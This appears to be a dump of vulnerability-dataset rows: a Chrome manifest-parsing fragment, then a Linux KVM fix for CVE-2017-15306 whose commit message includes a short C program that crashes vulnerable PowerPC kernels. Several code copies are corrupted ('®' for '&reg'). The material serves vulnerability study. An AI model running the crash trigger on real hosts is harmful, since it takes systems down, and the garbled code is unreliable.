bg_page.SchemeIs("http")))) {
*error = errors::kInvalidBackgroundInHostedApp;
return false;
}
background_url_ = bg_page;
} else {
background_url_ = GetResourceURL(background_str);
}
}
if (source.HasKey(keys::kDefaultLocale)) {
if (!source.GetString(keys::kDefaultLocale, &default_locale_) ||
!l10n_util::IsValidLocaleSyntax(default_locale_)) {
*error = errors::kInvalidDefaultLocale;
return false;
}
}
if (source.HasKey(keys::kChromeURLOverrides)) {
DictionaryValue* overrides = NULL;
if (!source.GetDictionary(keys::kChromeURLOverrides, &overrides)) {
*error = errors::kInvalidChromeURLOverrides;
return false;
}
for (DictionaryValue::key_iterator iter = overrides->begin_keys();
iter != overrides->end_keys(); ++iter) {
std::string page = *iter;
std::string val;
if ((page != chrome::kChromeUINewTabHost &&
#if defined(TOUCH_UI)
page != chrome::kChromeUIKeyboardHost &&
#endif
#if defined(OS_CHROMEOS)
page != chrome::kChromeUIActivationMessageHost &&
#endif
page != chrome::kChromeUIBookmarksHost &&
page != chrome::kChromeUIHistoryHost) ||
!overrides->GetStringWithoutPathExpansion(*iter, &val)) {
*error = errors::kInvalidChromeURLOverrides;
return false;
}
chrome_url_overrides_[page] = GetResourceURL(val);
}
if (overrides->size() > 1) {
*error = errors::kMultipleOverrides;
return false;
}
}
if (source.HasKey(keys::kOmnibox)) {
if (!source.GetString(keys::kOmniboxKeyword, &omnibox_keyword_) ||
omnibox_keyword_.empty()) {
*error = errors::kInvalidOmniboxKeyword;
return false;
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kContentSecurityPolicy)) {
std::string content_security_policy;
if (!source.GetString(keys::kContentSecurityPolicy,
&content_security_policy)) {
*error = errors::kInvalidContentSecurityPolicy;
return false;
}
const char kBadCSPCharacters[] = {'\r', '\n', '\0'};
if (content_security_policy.find_first_of(kBadCSPCharacters, 0,
arraysize(kBadCSPCharacters)) !=
std::string::npos) {
*error = errors::kInvalidContentSecurityPolicy;
return false;
}
content_security_policy_ = content_security_policy;
}
if (source.HasKey(keys::kDevToolsPage)) {
std::string devtools_str;
if (!source.GetString(keys::kDevToolsPage, &devtools_str)) {
*error = errors::kInvalidDevToolsPage;
return false;
}
if (!HasApiPermission(Extension::kExperimentalPermission)) {
*error = errors::kDevToolsExperimental;
return false;
}
devtools_url_ = GetResourceURL(devtools_str);
}
if (source.HasKey(keys::kSidebar)) {
DictionaryValue* sidebar_value = NULL;
if (!source.GetDictionary(keys::kSidebar, &sidebar_value)) {
*error = errors::kInvalidSidebar;
return false;
}
if (!HasApiPermission(Extension::kExperimentalPermission)) {
*error = errors::kSidebarExperimental;
return false;
}
sidebar_defaults_.reset(LoadExtensionSidebarDefaults(sidebar_value, error));
if (!sidebar_defaults_.get())
return false; // Failed to parse sidebar definition.
}
if (source.HasKey(keys::kTts)) {
DictionaryValue* tts_dict = NULL;
if (!source.GetDictionary(keys::kTts, &tts_dict)) {
*error = errors::kInvalidTts;
return false;
}
if (tts_dict->HasKey(keys::kTtsVoices)) {
ListValue* tts_voices = NULL;
if (!tts_dict->GetList(keys::kTtsVoices, &tts_voices)) {
*error = errors::kInvalidTtsVoices;
return false;
}
for (size_t i = 0; i < tts_voices->GetSize(); i++) {
DictionaryValue* one_tts_voice = NULL;
if (!tts_voices->GetDictionary(i, &one_tts_voice)) {
*error = errors::kInvalidTtsVoices;
return false;
}
TtsVoice voice_data;
if (one_tts_voice->HasKey(keys::kTtsVoicesVoiceName)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesVoiceName, &voice_data.voice_name)) {
*error = errors::kInvalidTtsVoicesVoiceName;
return false;
}
}
if (one_tts_voice->HasKey(keys::kTtsVoicesLocale)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesLocale, &voice_data.locale) ||
!l10n_util::IsValidLocaleSyntax(voice_data.locale)) {
*error = errors::kInvalidTtsVoicesLocale;
return false;
}
}
if (one_tts_voice->HasKey(keys::kTtsVoicesGender)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesGender, &voice_data.gender) ||
(voice_data.gender != keys::kTtsGenderMale &&
voice_data.gender != keys::kTtsGenderFemale)) {
*error = errors::kInvalidTtsVoicesGender;
return false;
}
}
tts_voices_.push_back(voice_data);
}
}
}
incognito_split_mode_ = is_app();
if (source.HasKey(keys::kIncognito)) {
std::string value;
if (!source.GetString(keys::kIncognito, &value)) {
*error = errors::kInvalidIncognitoBehavior;
return false;
}
if (value == values::kIncognitoSpanning) {
incognito_split_mode_ = false;
} else if (value == values::kIncognitoSplit) {
incognito_split_mode_ = true;
} else {
*error = errors::kInvalidIncognitoBehavior;
return false;
}
}
if (HasMultipleUISurfaces()) {
*error = errors::kOneUISurfaceOnly;
return false;
}
InitEffectiveHostPermissions();
DCHECK(source.Equals(manifest_value_.get()));
return true;
}
|
C
|
Chrome
| 1 |
CVE-2017-15306
|
https://www.cvedetails.com/cve/CVE-2017-15306/
|
CWE-476
|
https://github.com/torvalds/linux/commit/ac64115a66c18c01745bbd3c47a36b124e5fd8c0
|
ac64115a66c18c01745bbd3c47a36b124e5fd8c0
|
KVM: PPC: Fix oops when checking KVM_CAP_PPC_HTM
The following program causes a kernel oops:
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/kvm.h>
main()
{
int fd = open("/dev/kvm", O_RDWR);
ioctl(fd, KVM_CHECK_EXTENSION, KVM_CAP_PPC_HTM);
}
This happens because when using the global KVM fd with
KVM_CHECK_EXTENSION, kvm_vm_ioctl_check_extension() gets
called with a NULL kvm argument, which gets dereferenced
in is_kvmppc_hv_enabled(). Spotted while reading the code.
Let's use the hv_enabled fallback variable, like everywhere
else in this function.
Fixes: 23528bb21ee2 ("KVM: PPC: Introduce KVM_CAP_PPC_HTM")
Cc: stable@vger.kernel.org # v4.7+
Signed-off-by: Greg Kurz <groug@kaod.org>
Reviewed-by: David Gibson <david@gibson.dropbear.id.au>
Reviewed-by: Thomas Huth <thuth@redhat.com>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
|
long kvm_arch_vcpu_ioctl(struct file *filp,
unsigned int ioctl, unsigned long arg)
{
struct kvm_vcpu *vcpu = filp->private_data;
void __user *argp = (void __user *)arg;
long r;
switch (ioctl) {
case KVM_INTERRUPT: {
struct kvm_interrupt irq;
r = -EFAULT;
if (copy_from_user(&irq, argp, sizeof(irq)))
goto out;
r = kvm_vcpu_ioctl_interrupt(vcpu, &irq);
goto out;
}
case KVM_ENABLE_CAP:
{
struct kvm_enable_cap cap;
r = -EFAULT;
if (copy_from_user(&cap, argp, sizeof(cap)))
goto out;
r = kvm_vcpu_ioctl_enable_cap(vcpu, &cap);
break;
}
case KVM_SET_ONE_REG:
case KVM_GET_ONE_REG:
{
struct kvm_one_reg reg;
r = -EFAULT;
if (copy_from_user(®, argp, sizeof(reg)))
goto out;
if (ioctl == KVM_SET_ONE_REG)
r = kvm_vcpu_ioctl_set_one_reg(vcpu, ®);
else
r = kvm_vcpu_ioctl_get_one_reg(vcpu, ®);
break;
}
#if defined(CONFIG_KVM_E500V2) || defined(CONFIG_KVM_E500MC)
case KVM_DIRTY_TLB: {
struct kvm_dirty_tlb dirty;
r = -EFAULT;
if (copy_from_user(&dirty, argp, sizeof(dirty)))
goto out;
r = kvm_vcpu_ioctl_dirty_tlb(vcpu, &dirty);
break;
}
#endif
default:
r = -EINVAL;
}
out:
return r;
}
|
long kvm_arch_vcpu_ioctl(struct file *filp,
unsigned int ioctl, unsigned long arg)
{
struct kvm_vcpu *vcpu = filp->private_data;
void __user *argp = (void __user *)arg;
long r;
switch (ioctl) {
case KVM_INTERRUPT: {
struct kvm_interrupt irq;
r = -EFAULT;
if (copy_from_user(&irq, argp, sizeof(irq)))
goto out;
r = kvm_vcpu_ioctl_interrupt(vcpu, &irq);
goto out;
}
case KVM_ENABLE_CAP:
{
struct kvm_enable_cap cap;
r = -EFAULT;
if (copy_from_user(&cap, argp, sizeof(cap)))
goto out;
r = kvm_vcpu_ioctl_enable_cap(vcpu, &cap);
break;
}
case KVM_SET_ONE_REG:
case KVM_GET_ONE_REG:
{
struct kvm_one_reg reg;
r = -EFAULT;
if (copy_from_user(®, argp, sizeof(reg)))
goto out;
if (ioctl == KVM_SET_ONE_REG)
r = kvm_vcpu_ioctl_set_one_reg(vcpu, ®);
else
r = kvm_vcpu_ioctl_get_one_reg(vcpu, ®);
break;
}
#if defined(CONFIG_KVM_E500V2) || defined(CONFIG_KVM_E500MC)
case KVM_DIRTY_TLB: {
struct kvm_dirty_tlb dirty;
r = -EFAULT;
if (copy_from_user(&dirty, argp, sizeof(dirty)))
goto out;
r = kvm_vcpu_ioctl_dirty_tlb(vcpu, &dirty);
break;
}
#endif
default:
r = -EINVAL;
}
out:
return r;
}
|
C
|
linux
| 0 |
Subsets and Splits
CWE-119 Function Changes
This query retrieves specific examples (before and after code changes) of vulnerabilities with CWE-119, providing basic filtering but limited insight.
Vulnerable Code with CWE IDs
The query filters and combines records from multiple datasets to list specific vulnerability details, providing a basic overview of vulnerable functions but lacking deeper insights.
Vulnerable Functions in BigVul
Retrieves details of vulnerable functions from both validation and test datasets where vulnerabilities are present, providing a basic set of data points for further analysis.
Vulnerable Code Functions
This query filters and shows raw data for vulnerable functions, which provides basic insight into specific vulnerabilities but lacks broader analytical value.
Top 100 Vulnerable Functions
Retrieves 100 samples of vulnerabilities from the training dataset, showing the CVE ID, CWE ID, and code changes before and after the vulnerability, which is a basic filtering of vulnerability data.